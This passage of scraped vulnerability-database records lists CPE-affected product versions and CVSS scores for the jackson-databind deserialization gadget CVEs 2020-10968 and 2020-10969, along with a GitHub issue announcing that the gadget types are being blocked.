"versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", "matchCriteriaId": "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", "matchCriteriaId": "18127694-109C-4E7E-AE79-0BA351849291", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", "matchCriteriaId": "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "5343F8F8-E8B4-49E9-A304-9C8A608B8027", "versionEndExcluding": null, "versionEndIncluding": "2.9.0", "versionStartExcluding": null, "versionStartIncluding": "2.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "46059231-E7F6-4402-8119-1C7FE4ABEA96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "113E281E-977E-4195-B131-B7C7A2933B6E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "D01A0BBC-DA0E-4AFE-83BF-4F3BA01653EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "526E2FE5-263F-416F-8628-6CD40B865780", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "B51F78F4-8D7E-48C2-86D1-D53A6EB348A7", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "0DB23B9A-571E-4B77-B432-23F3DC9B67D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*", "matchCriteriaId": "2AB443D1-D8E0-4253-9E1C-B62AEBBE582A", "versionEndExcluding": null, "versionEndIncluding": "12.0.3", "versionStartExcluding": null, "versionStartIncluding": "12.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "ECC00750-1DBF-401F-886E-E0E65A277409", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E5416A1-EE58-415D-9645-B6A875EBAED2", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "11B0C37E-D7C7-45F2-A8D8-5A3B1B191430", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "7582B307-3899-4BBB-B868-BC912A4D0109", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", "matchCriteriaId": "021014B2-DC51-481C-BCFE-5857EFBDEDDA", "versionEndExcluding": null, "versionEndIncluding": "8.1.0", "versionStartExcluding": null, "versionStartIncluding": "8.0.6", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "37C8EE84-A840-4132-B331-C7D450B1FBBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "1D8436A2-9CA3-4C91-B632-9B03368ABC1B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A00142E6-EEB3-44BD-AB0D-0E5C5640557F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "4A01F8ED-64DA-43BC-9C02-488010BCD0F4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "75638A6A-88B2-4BC7-84EA-1CF5FC30D555", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_retail_customer_analytics:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "1FBF422E-3F67-4599-A7C1-0E2E4224553A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "A8200D5C-D3C7-4936-84A7-37864DEEC62B", "versionEndExcluding": "12.2.0.1.20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2.25:*:*:*:*:*:*:*", "matchCriteriaId": "72F28CE3-F835-4458-8D70-CBE9FC2F7E7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0.15:*:*:*:*:*:*:*", "matchCriteriaId": "9F058FDA-04BC-4F32-830D-206983770692", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E46AE88-E9F8-41CB-B15F-12F5127A1E8D", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3D635AE-5E4A-47FB-9FCA-D82D52A61367", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", "matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", "versionEndExcluding": null, "versionEndIncluding": "17.12", "versionStartExcluding": null, "versionStartIncluding": "17.7", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", "matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", "matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", "matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", "matchCriteriaId": "10864586-270E-4ACF-BDCC-ECFCD299305F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "792DF04A-2D1B-40B5-B960-3E7152732EB8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "7DA6E92C-AC3B-40CF-96AE-22CD8769886F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "378A6656-252B-4929-83EA-BC107FDFD357", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "363395FA-C296-4B2B-9D6F-BCB8DBE6FACE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "F62A2144-5EF8-4319-B8C2-D7975F51E5FA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "11DA6839-849D-4CEF-85F3-38FE75E07183", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "BCE78490-A4BE-40BD-8C72-0A4526BBD4A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "55AE3629-4A66-49E4-A33D-6D81CC94962F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*", "matchCriteriaId": "4CB39A1A-AD29-45DD-9EB5-5E2053A01B9A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*", "matchCriteriaId": "27C26705-6D1F-4D5E-B64D-B479108154FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2662
[ "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type(s) reported regarding a class of `aoju/bus-proxy` library. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-10968 Reporter: XuYuanzhen (of Alibaba Cloud Security Team) Fix will be included in: * 2.9.10.4 * Does not affect 2.10.0 and later
Block one more gadget type (bus-proxy, CVE-2020-10968)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2662/comments
0
2020-03-23T01:31:30Z
2020-03-26T16:29:54Z
https://github.com/FasterXML/jackson-databind/issues/2662
585,867,685
2,662
1,136
CVE-2020-10969
2020-03-26T13:15:13.077
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2642" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200403-0002/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2642" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200403-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "29BC94E0-FEBC-4E86-825C-0101DC339852", "versionEndExcluding": "2.7.9.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "04F30C23-46F8-4F58-807B-002C5E96B7F7", "versionEndExcluding": "2.8.11.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "77F8EDB1-5890-4054-84FF-2034C7D2ED96", "versionEndExcluding": "2.9.10.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "97994257-C9A4-4491-B362-E8B25B7187AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", "matchCriteriaId": "BBE7BF09-B89C-4590-821E-6C0587E096B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", "matchCriteriaId": "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", "matchCriteriaId": "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", "matchCriteriaId": "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", "matchCriteriaId": "18127694-109C-4E7E-AE79-0BA351849291", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", "matchCriteriaId": "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "5343F8F8-E8B4-49E9-A304-9C8A608B8027", "versionEndExcluding": null, "versionEndIncluding": "2.9.0", "versionStartExcluding": null, "versionStartIncluding": "2.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "46059231-E7F6-4402-8119-1C7FE4ABEA96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "113E281E-977E-4195-B131-B7C7A2933B6E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "D01A0BBC-DA0E-4AFE-83BF-4F3BA01653EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "526E2FE5-263F-416F-8628-6CD40B865780", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "B51F78F4-8D7E-48C2-86D1-D53A6EB348A7", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "0DB23B9A-571E-4B77-B432-23F3DC9B67D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*", "matchCriteriaId": "2AB443D1-D8E0-4253-9E1C-B62AEBBE582A", "versionEndExcluding": null, "versionEndIncluding": "12.0.3", "versionStartExcluding": null, "versionStartIncluding": "12.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "ECC00750-1DBF-401F-886E-E0E65A277409", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E5416A1-EE58-415D-9645-B6A875EBAED2", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "11B0C37E-D7C7-45F2-A8D8-5A3B1B191430", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "7582B307-3899-4BBB-B868-BC912A4D0109", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", "matchCriteriaId": "021014B2-DC51-481C-BCFE-5857EFBDEDDA", "versionEndExcluding": null, "versionEndIncluding": "8.1.0", "versionStartExcluding": null, "versionStartIncluding": "8.0.6", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "37C8EE84-A840-4132-B331-C7D450B1FBBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "1D8436A2-9CA3-4C91-B632-9B03368ABC1B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A00142E6-EEB3-44BD-AB0D-0E5C5640557F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "4A01F8ED-64DA-43BC-9C02-488010BCD0F4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "75638A6A-88B2-4BC7-84EA-1CF5FC30D555", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_retail_customer_analytics:8.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "1FBF422E-3F67-4599-A7C1-0E2E4224553A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "A8200D5C-D3C7-4936-84A7-37864DEEC62B", "versionEndExcluding": "12.2.0.1.20", "versionEndIncluding": null, "versionStartExcluding": null, 